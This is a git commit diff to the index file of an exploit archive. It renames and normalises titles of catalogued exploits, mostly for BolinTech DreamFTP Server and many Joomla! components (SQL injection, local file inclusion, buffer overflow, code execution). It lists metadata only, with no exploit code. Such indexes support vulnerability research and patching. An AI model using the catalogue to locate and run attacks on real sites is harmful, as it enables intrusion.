DB: 2016-11-08
7 new exploits BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String BolinTech DreamFTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Dream FTP Server 1.0.2 - (PORT) Remote Denial of Service BolinTech DreamFTP Server 1.0.2 - (PORT) Remote Denial of Service BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC) BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC) Dream FTP Server 1.02 - (users.dat) Arbitrary File Disclosure BolinTech DreamFTP Server 1.02 - 'users.dat' Arbitrary File Disclosure Joomla! Component com_menu - SQL Injection Joomla! Component 'com_menu' - SQL Injection Joomla! Component com_jp_jobs - SQL Injection Joomla! Component 'com_jp_jobs' 1.4.1 - SQL Injection Joomla! Component redSHOP - Local File Inclusion Joomla! Component redTWITTER - Local File Inclusion Joomla! Component WISro Yahoo Quotes - Local File Inclusion Joomla! Component com_press - SQL Injection Joomla! Component Picasa 2.0 - Local File Inclusion Joomla! Component 'com_redshop' 1.0 - Local File Inclusion Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion Joomla! Component 'com_wisroyq' 1.1 - Local File Inclusion Joomla! Component 'com_press' - SQL Injection Joomla! Component 'com_joomlapicasa' 2.0 - Local File Inclusion Joomla! Component com_serie - SQL Injection Joomla! Component 'com_serie' - SQL Injection Joomla! Component com_ranking - SQL Injection Joomla! Component JInventory - Local File Inclusion Joomla! Component com_svmap 1.1.1 - Local File Inclusion Joomla! Component com_shoutbox - Local File Inclusion Joomla! Component com_loginbox - Local File Inclusion Joomla! Component com_bca-rss-syndicator - Local File Inclusion Joomla! Component Magic Updater (com_Joomlaupdater) - Local File Inclusion Joomla! Component 'com_ranking' - SQL Injection Joomla! Component 'com_jinventory' - Local File Inclusion Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion Joomla! 
Component 'com_shoutbox' - Local File Inclusion Joomla! Component 'com_loginbox' - Local File Inclusion Joomla! Component 'com_bca-rss-syndicator' - Local File Inclusion Joomla! Component 'com_Joomlaupdater' - Local File Inclusion Joomla! Component News Portal com_news - Local File Inclusion Joomla! Component FreeStyle FAQ Lite 1.3 com_fss (faqid) - SQL Injection Joomla! Component 'com_news_portal' 1.5.x - Local File Inclusion Joomla! Component 'com_fss' 1.3 - 'faqid' Parameter SQL Injection Joomla! Component Saber Cart com_sebercart - Local File Inclusion Joomla! Component J!WHMCS Integrator com_jwhmcs - Local File Inclusion Joomla! Component Juke Box com_jukebox - Local File Inclusion Joomla! Component Joomla! Flickr com_Joomlaflickr - Local File Inclusion Joomla! Component Highslide JS com_hsconfig - Local File Inclusion Joomla! Component Fabrik com_fabrik - Local File Inclusion Joomla! Component Affiliate Feeds com_datafeeds - Local File Inclusion Joomla! Component Appointment com_appointment - Local File Inclusion Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion Joomla! Component 'com_jwhmcs' 1.5.0 - Local File Inclusion Joomla! Component 'com_jukebox' 1.7 - Local File Inclusion Joomla! Component 'com_Joomlaflickr' 1.0 - Local File Inclusion Joomla! Component 'com_hsconfig' 1.5 - Local File Inclusion Joomla! Component 'com_fabrik' 2.0 - Local File Inclusion Joomla! Component 'com_datafeeds' 880 - Local File Inclusion Joomla! Component 'com_appointment' 1.5 - Local File Inclusion Joomla! Component XOBBIX - prodid SQL Injection Joomla! Component 'com_xobbix' 1.0 - 'prodid' Parameter SQL Injection Joomla! Component aWiki com_awiki - Local File Inclusion Joomla! Component VJDEO com_vjdeo 1.0 - Local File Inclusion Joomla! Component 'com_awiki' - Local File Inclusion Joomla! Component 'com_vjdeo' 1.0 - Local File Inclusion Joomla! Component com_articles - SQL Injection Joomla! Component 'com_articles' - SQL Injection Joomla! 
Component Webee Comments - Local File Inclusion Joomla! Component Realtyna Translator - Local File Inclusion Joomla! Component AWDwall-Joomla! - (cbuser) Local File Inclusion / SQL Injection Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion Joomla! Component 'com_realtyna' 1.0.15 - Local File Inclusion Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection Joomla! Component PowerMail Pro com_powermail - Local File Inclusion Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion Joomla! Component Foobla Suggestions com_foobla - Local File Inclusion Joomla! Component JA Voice com_javoice - Local File Inclusion Joomla! Component 'com_foobla_suggestions' 1.5.1.2 - Local File Inclusion Joomla! Component 'com_javoice' - Local File Inclusion Joomla! Component com_pcchess - Local File Inclusion Joomla! Component huruhelpdesk - SQL Injection Joomla! Component 'com_pcchess' - Local File Inclusion Joomla! Component 'com_huruhelpdesk' - SQL Injection Joomla! Component com_agenda 1.0.1 - 'id' SQL Injection Joomla! Component 'com_agenda' 1.0.1 - 'id' Parameter SQL Injection Joomla! Component com_properties[aid] - SQL Injection Joomla! Component allvideos - Blind SQL Injection Joomla! Component com_Ca - SQL Injection Joomla! Component 'com_properties' - 'aid' Parameter SQL Injection Joomla! Component 'com_allvideos' - Blind SQL Injection Joomla! Component 'com_ca' - SQL Injection Joomla! Component TweetLA! - Local File Inclusion Joomla! Component Ticketbook - Local File Inclusion Joomla! Component JA Job Board - Multiple Local File Inclusion Joomla! Component Jfeedback! - Local File Inclusion Joomla! Component JProject Manager - Local File Inclusion Joomla! Component Preventive And Reservation - Local File Inclusion Joomla! Component RokModule - 'moduleid' Blind SQL Injection Joomla! Component spsNewsletter - Local File Inclusion Joomla! Component AlphaUserPoints - Local File Inclusion Joomla! 
Component TRAVELbook - Local File Inclusion Joomla! Component 'com_tweetla' - Local File Inclusion Joomla! Component 'com_ticketbook' - Local File Inclusion Joomla! Component 'com_jajobboard' - Multiple Local File Inclusion Joomla! Component 'com_jfeedback' - Local File Inclusion Joomla! Component 'com_jprojectmanager' - Local File Inclusion Joomla! Component 'com_preventive' - Local File Inclusion Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection Joomla! Component 'com_spsnewsletter' - Local File Inclusion Joomla! Component 'com_alphauserpoints' 1.5.5 - Local File Inclusion Joomla! Component 'com_travelbook' 1.0.1 - Local File Inclusion Joomla! Component education - SQL Injection Joomla! Component 'com_education_classess' - SQL Injection Joomla! Component Multi-Venue Restaurant Menu Manager - SQL Injection Joomla! Component 'com_mv_restaurantmenumanager' 1.5.2 - SQL Injection Joomla! Component mv_restaurantmenumanager - SQL Injection Joomla! Component 'mv_restaurantmenumanager' - SQL Injection Joomla! Component Web TV com_webtv - Local File Inclusion Joomla! Component Horoscope com_horoscope - Local File Inclusion Joomla! Component Arcade Games com_arcadegames - Local File Inclusion Joomla! Component Flashgames com_Flashgames - Local File Inclusion Joomla! Component AddressBook com_AddressBook - Local File Inclusion Joomla! Component Easy Ad Banner com_advertising - Local File Inclusion Joomla! Component CV Maker com_cvmaker - Local File Inclusion Joomla! Component My Files com_myfiles - Local File Inclusion Joomla! Component Online Exam com_onlineexam - Local File Inclusion Joomla! Component JoomMail com_joommail - Local File Inclusion Joomla! Component Memory Book com_memory - Local File Inclusion Joomla! Component Online Market com_market - Local File Inclusion Joomla! Component Digital Diary com_diary - Local File Inclusion Joomla! Component 'com_webtv' - Local File Inclusion Joomla! 
Component 'com_horoscope' - Local File Inclusion Joomla! Component 'com_arcadegames' - Local File Inclusion Joomla! Component 'com_Flashgames' - Local File Inclusion Joomla! Component 'com_AddressBook' - Local File Inclusion Joomla! Component 'com_advertising' - Local File Inclusion Joomla! Component 'com_cvmaker' - Local File Inclusion Joomla! Component 'com_myfiles' - Local File Inclusion Joomla! Component 'com_onlineexam' - Local File Inclusion Joomla! Component 'com_joommail' - Local File Inclusion Joomla! Component 'com_memory' - Local File Inclusion Joomla! Component 'com_market' - Local File Inclusion Joomla! Component 'com_diary' - Local File Inclusion Joomla! Component com_worldrates - Local File Inclusion Joomla! Component com_record - Local File Inclusion Joomla! Component com_sweetykeeper - Local File Inclusion Joomla! Component com_jdrugstopics - SQL Injection Joomla! Component com_sermonspeaker - SQL Injection Joomla! Component com_flexicontent - Local File Joomla! Component 'com_worldrates' - Local File Inclusion Joomla! Component 'com_record' - Local File Inclusion Joomla! Component 'com_sweetykeeper' - Local File Inclusion Joomla! Component 'com_jdrugstopics' - SQL Injection Joomla! Component 'com_sermonspeaker' - SQL Injection Joomla! Component 'com_flexicontent' - Local File Joomla! Component Jvehicles - (aid) SQL Injection Joomla! Component com_jp_jobs 1.2.0 - 'id' SQL Injection Joomla! Component 'com_jvehicles' - 'aid' Parameter SQL Injection Joomla! Component 'com_jp_jobs' 1.2.0 - 'id' Parameter SQL Injection Joomla! Component com_QPersonel - SQL Injection Joomla! Component 'com_QPersonel' - SQL Injection Joomla! Component wgPicasa com_wgpicasa - Local File Inclusion Joomla! Component S5 Clan Roster com_s5clanroster - Local File Inclusion Joomla! Component Photo Battle com_photobattle - Local File Inclusion Joomla! Component MT Fire Eagle com_mtfireeagle - Local File Inclusion Joomla! 
Component Media Mall Factory com_mediamall - Blind SQL Injection Joomla! Component Love Factory com_lovefactory - Local File Inclusion Joomla! Component JA Comment com_jacomment - Local File Inclusion Joomla! Component Delicious BookMarks com_delicious - Local File Inclusion Joomla! Component Deluxe Blog Factory com_blogfactory - Local File Inclusion Joomla! Component BeeHeard Lite com_beeheard - Local File Inclusion Joomla! Component 'com_wgpicasa' - Local File Inclusion Joomla! Component 'com_s5clanroster' - Local File Inclusion Joomla! Component 'com_photobattle' - Local File Inclusion Joomla! Component 'com_mtfireeagle' - Local File Inclusion Joomla! Component 'com_mediamall' - Blind SQL Injection Joomla! Component 'com_lovefactory' - Local File Inclusion Joomla! Component 'com_jacomment' - Local File Inclusion Joomla! Component 'com_delicious' - Local File Inclusion Joomla! Component 'com_blogfactory' - Local File Inclusion Joomla! Component 'com_beeheard' - Local File Inclusion Joomla! Component com_iproperty 1.5.3 - 'id' SQL Injection Joomla! Component 'com_iproperty' 1.5.3 - 'id' Parameter SQL Injection Joomla! Component com_manager 1.5.3 - 'id' SQL Injection Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection Joomla! Component com_joltcard - SQL Injection Joomla! Component com_pandafminigames - SQL Injection Joomla! Component 'com_joltcard' - SQL Injection Joomla! Component 'com_pandafminigames' - SQL Injection Joomla! Component Archery Scores (com_archeryscores) 1.0.6 - Local File Inclusion Joomla! Component ZiMB Comment com_zimbcomment - Local File Inclusion Joomla! Component ZiMB Manager com_zimbcore - Local File Inclusion Joomla! Component Gadget Factory com_gadgetfactory - Local File Inclusion Joomla! Component Matamko com_matamko - Local File Inclusion Joomla! Component Multiple Root com_multiroot - Local File Inclusion Joomla! Component Multiple Map com_multimap - Local File Inclusion Joomla! 
Component Contact Us Draw Root Map com_drawroot - Local File Inclusion Joomla! Component Contact Us Google Map com_google - Local File Inclusion Joomla! Component iF surfALERT com_if_surfalert - Local File Inclusion Joomla! Component 'com_archeryscores' 1.0.6 - Local File Inclusion Joomla! Component 'com_zimbcomment' - Local File Inclusion Joomla! Component 'com_zimbcore' - Local File Inclusion Joomla! Component 'com_gadgetfactory' - Local File Inclusion Joomla! Component 'com_matamko' - Local File Inclusion Joomla! Component 'com_multiroot' - Local File Inclusion Joomla! Component 'com_multimap' - Local File Inclusion Joomla! Component 'com_drawroot' - Local File Inclusion Joomla! Component 'com_google' - Local File Inclusion Joomla! Component 'com_if_surfalert' - Local File Inclusion Joomla! Component GBU FACEBOOK 1.0.5 - SQL Injection Joomla! Component 'com_gbufacebook' 1.0.5 - SQL Injection Joomla! Component com_jnewspaper - 'cid' SQL Injection Joomla! Component JTM Reseller 1.9 Beta - SQL Injection Joomla! Component 'com_jnewspaper' - 'cid' Parameter SQL Injection Joomla! Component 'com_jtm' 1.9 Beta - SQL Injection Joomla! Component wmi (com_wmi) - Local File Inclusion Joomla! Component OrgChart com_orgchart - Local File Inclusion Joomla! Component Mms Blog com_mmsblog - Local File Inclusion Joomla! Component 'com_wmi' - Local File Inclusion Joomla! Component 'com_orgchart' - Local File Inclusion Joomla! Component 'com_mmsblog' - Local File Inclusion Joomla! Component com_portfolio - Local File Disclosure Joomla! Component 'com_portfolio' - Local File Disclosure Joomla! Component com_caddy - Exploit Joomla! Component 'com_caddy' - Exploit Joomla! Component com_joomradio - SQL Injection Joomla! Component 'com_joomradio' - SQL Injection Joomla! Component Ultimate Portfolio com_ultimateportfolio - Local File Inclusion Joomla! Component NoticeBoard com_noticeboard - Local File Inclusion Joomla! Component SmartSite com_smartsite - Local File Inclusion Joomla! 
Extension ABC com_abc - SQL Injection Joomla! Component graphics (com_graphics) 1.0.6 - Local File Inclusion Joomla! Component 'com_ultimateportfolio' - Local File Inclusion Joomla! Component 'com_noticeboard' - Local File Inclusion Joomla! Component 'com_smartsite' - Local File Inclusion Joomla! Component 'com_abc' - SQL Injection Joomla! Component 'com_graphics' 1.0.6 - Local File Inclusion Joomla! Component JE Property Finder - Arbitrary File Upload Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload Joomla! Component Wap4Joomla! - 'wapmain.php' SQL Injection Joomla! Component 'Wap4Joomla' - 'wapmain.php' SQL Injection Joomla! Component com_newsfeeds - SQL Injection Joomla! Component 'com_newsfeeds' - SQL Injection Joomla! Component Table JX - Cross-Site Scripting Vulnerabilities Joomla! Component Card View JX - Cross-Site Scripting Joomla! Component 'Table JX' - Cross-Site Scripting Joomla! Component 'Card View JX' - Cross-Site Scripting Joomla! Extension DJ-Classifieds com_djClassifieds - Arbitrary File Upload Joomla! 'com_djClassifieds' 0.9.1 - Arbitrary File Upload Joomla! Component com_articleman - Arbitrary File Upload Joomla! Component 'com_articleman' - Arbitrary File Upload Joomla! Component Module Camp26 Visitor Data 1.1 - Remote code Execution Joomla! Component 'mod_VisitorData' 1.1 - Remote code Execution Joomla! Component Custom PHP Pages com_PHP - Local File Inclusion Joomla! Component 'com_PHP' 0.1 - Local File Inclusion Joomla! Component com_konsultasi - 'sid' SQL Injection Joomla! Component 'com_konsultasi' - 'sid' Parameter SQL Injection Joomla! Component Advertising (com_aardvertiser) 2.0 - Local File Inclusion Joomla! Component 'com_aardvertiser' 2.0 - Local File Inclusion Joomla! Component Seber Cart - 'getPic.php' Local File Disclosure Joomla! Component FDione Form Wizard - Local File Inclusion Joomla! Component 'com_sebercart' - 'getPic.php' Local File Disclosure Joomla! 
Component 'com_dioneformwizard' - Local File Inclusion Joomla! Component com_jejob JE Job 1.0 - Local File Inclusion Joomla! Component 'com_jejob' 1.0 - Local File Inclusion Joomla! Component com_jequoteform - Local File Inclusion Joomla! Component 'com_jequoteform' - Local File Inclusion Joomla! Component MS Comment 0.8.0b - Local File Inclusion Joomla! Component 'com_mscomment' 0.8.0b - Local File Inclusion Joomla! Component com_camp - SQL Injection Joomla! Component 'com_camp' - SQL Injection Joomla! Component simpledownload 0.9.5 - Local File Inclusion Joomla! Component 'com_simpledownload' 0.9.5 - Local File Inclusion Joomla! Component simpledownload 0.9.5 - Local File Disclosure Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure Joomla! Component com_crowdsource - SQL Injection Joomla! Component com_event - Multiple Vulnerabilities Joomla! Component 'com_crowdsource' - SQL Injection Joomla! Component 'com_event' - Multiple Vulnerabilities Joomla! Component com_event - SQL Injection Joomla! Component 'com_event' - SQL Injection Joomla! Component com_packages - SQL Injection Joomla! Component 'com_packages' - SQL Injection Joomla! Component com_qpersonel - SQL Injection Remote Exploit Joomla! Component 'com_qpersonel' 1.0 - SQL Injection BolinTech Dream FTP Server 1.02 - Format String (Metasploit) BolinTech DreamFTP Server 1.02 - Format String (Metasploit) PHP 5.4.3 (Windows x86) - Code Execution PHP 5.4.3 (Windows x86 Polish) - Code Execution Schoolhos CMS Beta 2.29 - (index.php id Parameter) SQL Injection Schoolhos CMS Beta 2.29 - 'id' Parameter SQL Injection BolinTech Dream FTP Server 1.0 - User Name Format String (1) BolinTech DreamFTP Server 1.0 - User Name Format String (1) Joomla! Component JoomlaTune JComments 2.1 - 'ComntrNam' Parameter Cross-Site Scripting Joomla! Component 'com_jcomments' 2.1 - 'ComntrNam' Parameter Cross-Site Scripting Joomla! 
Component Percha Image Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component Percha Fields Attach 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchaimageattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchafieldsattach' 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component Percha Multicategory Article 0.6 - 'index.php' Controller Parameter Arbitrary File Access Joomla! Component 'com_perchacategoriestree' 0.6 - 'Controller' Parameter Arbitrary File Access Joomla! Component com_horses - 'id' Parameter SQL Injection Joomla! Component 'com_horses' - 'id' Parameter SQL Injection FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation FreePBX 13 - Remote Command Execution / Privilege Escalation BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow Schoolhos CMS 2.29 - 'kelas' Parameter SQL Injection Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080 / MS14-084) Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read NodCMS - PHP Code Execution Piwik 2.16.0 - 'layout' PHP Object Injection Sophos Web Appliance 4.2.1.3 - Remote Code Execution
parent
b80848bd60
commit
1e08cb156e
9 changed files with 976 additions and 154 deletions
313
files.csv
|
@ -645,7 +645,7 @@ id,file,description,date,author,platform,type,port
|
|||
819,platforms/windows/remote/819.py,"Savant Web Server 3.1 (French Windows OS support) - Remote Buffer Overflow",2005-02-15,"Jerome Athias",windows,remote,80
|
||||
820,platforms/php/webapps/820.php,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0
|
||||
822,platforms/windows/remote/822.c,"RhinoSoft Serv-U FTPd Server 4.x - 'site chmod' Remote Buffer Overflow",2004-01-30,Skylined,windows,remote,21
|
||||
823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String",2004-02-11,Skylined,windows,remote,21
|
||||
823,platforms/windows/remote/823.c,"BolinTech DreamFTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String",2004-02-11,Skylined,windows,remote,21
|
||||
824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)",2005-09-13,Qnix,linux,local,0
|
||||
825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow",2005-02-17,c0d3r,windows,remote,21
|
||||
826,platforms/linux/remote/826.c,"Medal of Honor Spearhead (Linux) - Server Remote Buffer Overflow",2005-02-18,millhouse,linux,remote,12203
|
||||
|
@ -2649,7 +2649,7 @@ id,file,description,date,author,platform,type,port
|
|||
2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - (htm2PHP.php) File Disclosure",2006-12-21,"the master",php,webapps,0
|
||||
2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - (mapage.php) Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0
|
||||
2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0
|
||||
2972,platforms/windows/dos/2972.c,"Dream FTP Server 1.0.2 - (PORT) Remote Denial of Service",2006-12-21,InTeL,windows,dos,0
|
||||
2972,platforms/windows/dos/2972.c,"BolinTech DreamFTP Server 1.0.2 - (PORT) Remote Denial of Service",2006-12-21,InTeL,windows,dos,0
|
||||
2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a - (footer.inc.php) Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0
|
||||
2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0
|
||||
2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,php,webapps,0
|
||||
|
@ -2805,7 +2805,7 @@ id,file,description,date,author,platform,type,port
|
|||
3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0
|
||||
3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0
|
||||
3127,platforms/windows/dos/3127.c,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
|
||||
3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
|
||||
3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
|
||||
3130,platforms/osx/dos/3130.c,"Apple Mac OSX 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC)",2007-01-14,MoAB,osx,dos,0
|
||||
3131,platforms/windows/local/3131.c,"Kaspersky AntiVirus 6.0 - Privilege Escalation",2007-01-15,MaD,windows,local,0
|
||||
3132,platforms/windows/remote/3132.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",windows,remote,69
|
||||
|
@ -8038,7 +8038,7 @@ id,file,description,date,author,platform,type,port
|
|||
8522,platforms/windows/dos/8522.pl,"Zervit Web Server 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0
|
||||
8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard - Remote Denial of Service (PoC)",2009-04-23,shinnai,windows,dos,0
|
||||
8524,platforms/windows/dos/8524.txt,"Home Web Server r1.7.1 (build 147) - Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0
|
||||
8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 - (users.dat) Arbitrary File Disclosure",2009-04-23,Cyber-Zone,windows,remote,0
|
||||
8525,platforms/windows/remote/8525.pl,"BolinTech DreamFTP Server 1.02 - 'users.dat' Arbitrary File Disclosure",2009-04-23,Cyber-Zone,windows,remote,0
|
||||
8526,platforms/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow (PoC)",2009-04-23,x.CJP.x,windows,dos,0
|
||||
8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - (Skin) Buffer Overflow",2009-04-23,Stack,windows,local,0
|
||||
8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling",2009-04-24,ZoRLu,asp,webapps,0
|
||||
|
@ -10979,7 +10979,7 @@ id,file,description,date,author,platform,type,port
|
|||
12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0
|
||||
12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 - OOB Array Indexing",2010-04-02,"Tobias Klein",windows,dos,0
|
||||
12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - Exploit (2)",2010-04-02,"Richard leahy",windows,local,0
|
||||
12015,platforms/php/webapps/12015.txt,"Joomla! Component com_menu - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12015,platforms/php/webapps/12015.txt,"Joomla! Component 'com_menu' - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12016,platforms/php/webapps/12016.txt,"Joomla! Component com_ops - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12017,platforms/php/webapps/12017.txt,"Joomla! Component com_football - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
|
||||
|
@ -10999,7 +10999,7 @@ id,file,description,date,author,platform,type,port
|
|||
12034,platforms/php/webapps/12034.txt,"Flatpress 0.909.1 - Persistent Cross-Site Scripting",2010-04-03,ITSecTeam,php,webapps,0
|
||||
12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - SEH Exploit",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0
|
||||
12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2010-04-03,l3D,hardware,webapps,0
|
||||
12037,platforms/php/webapps/12037.txt,"Joomla! Component com_jp_jobs - SQL Injection",2010-04-03,Valentin,php,webapps,0
|
||||
12037,platforms/php/webapps/12037.txt,"Joomla! Component 'com_jp_jobs' 1.4.1 - SQL Injection",2010-04-03,Valentin,php,webapps,0
|
||||
12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites - Bypass Create And Download SQL Backup",2010-04-04,indoushka,php,webapps,0
|
||||
12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 - Backup Dump",2010-04-04,indoushka,multiple,webapps,0
|
||||
12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0
|
||||
|
@ -11014,40 +11014,40 @@ id,file,description,date,author,platform,type,port
|
|||
12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow",2010-04-04,"Yakir Wizman",windows,local,0
|
||||
12052,platforms/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Inclusion",2010-04-04,mat,php,webapps,0
|
||||
12053,platforms/windows/local/12053.py,"ZipCentral - '.zip' SEH Exploit",2010-04-04,TecR0c,windows,local,0
|
||||
12054,platforms/php/webapps/12054.txt,"Joomla! Component redSHOP - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
|
||||
12055,platforms/php/webapps/12055.txt,"Joomla! Component redTWITTER - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
|
||||
12056,platforms/php/webapps/12056.txt,"Joomla! Component WISro Yahoo Quotes - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
|
||||
12057,platforms/php/webapps/12057.txt,"Joomla! Component com_press - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
|
||||
12058,platforms/php/webapps/12058.txt,"Joomla! Component Picasa 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0
|
||||
12054,platforms/php/webapps/12054.txt,"Joomla! Component 'com_redshop' 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
|
||||
12055,platforms/php/webapps/12055.txt,"Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
|
||||
12056,platforms/php/webapps/12056.txt,"Joomla! Component 'com_wisroyq' 1.1 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
|
||||
12057,platforms/php/webapps/12057.txt,"Joomla! Component 'com_press' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
|
||||
12058,platforms/php/webapps/12058.txt,"Joomla! Component 'com_joomlapicasa' 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0
|
||||
12059,platforms/windows/local/12059.pl,"eZip Wizard 3.0 - '.zip' SEH Exploit",2010-04-04,"Lincoln and corelanc0d3r",windows,local,0
|
||||
12060,platforms/php/webapps/12060.txt,"Joomla! Component com_serie - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
|
||||
12060,platforms/php/webapps/12060.txt,"Joomla! Component 'com_serie' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
|
||||
12061,platforms/php/webapps/12061.txt,"Facil-CMS - (Local File Inclusion / Remote File Inclusion)",2010-04-04,eidelweiss,php,webapps,0
|
||||
12062,platforms/php/webapps/12062.txt,"Joomla! Component com_ranking - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
|
||||
12065,platforms/php/webapps/12065.txt,"Joomla! Component JInventory - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0
|
||||
12066,platforms/php/webapps/12066.txt,"Joomla! Component com_svmap 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12067,platforms/php/webapps/12067.txt,"Joomla! Component com_shoutbox - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12068,platforms/php/webapps/12068.txt,"Joomla! Component com_loginbox - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12069,platforms/php/webapps/12069.txt,"Joomla! Component com_bca-rss-syndicator - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12070,platforms/php/webapps/12070.txt,"Joomla! Component Magic Updater (com_Joomlaupdater) - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12062,platforms/php/webapps/12062.txt,"Joomla! Component 'com_ranking' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
|
||||
12065,platforms/php/webapps/12065.txt,"Joomla! Component 'com_jinventory' - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0
|
||||
12066,platforms/php/webapps/12066.txt,"Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12067,platforms/php/webapps/12067.txt,"Joomla! Component 'com_shoutbox' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
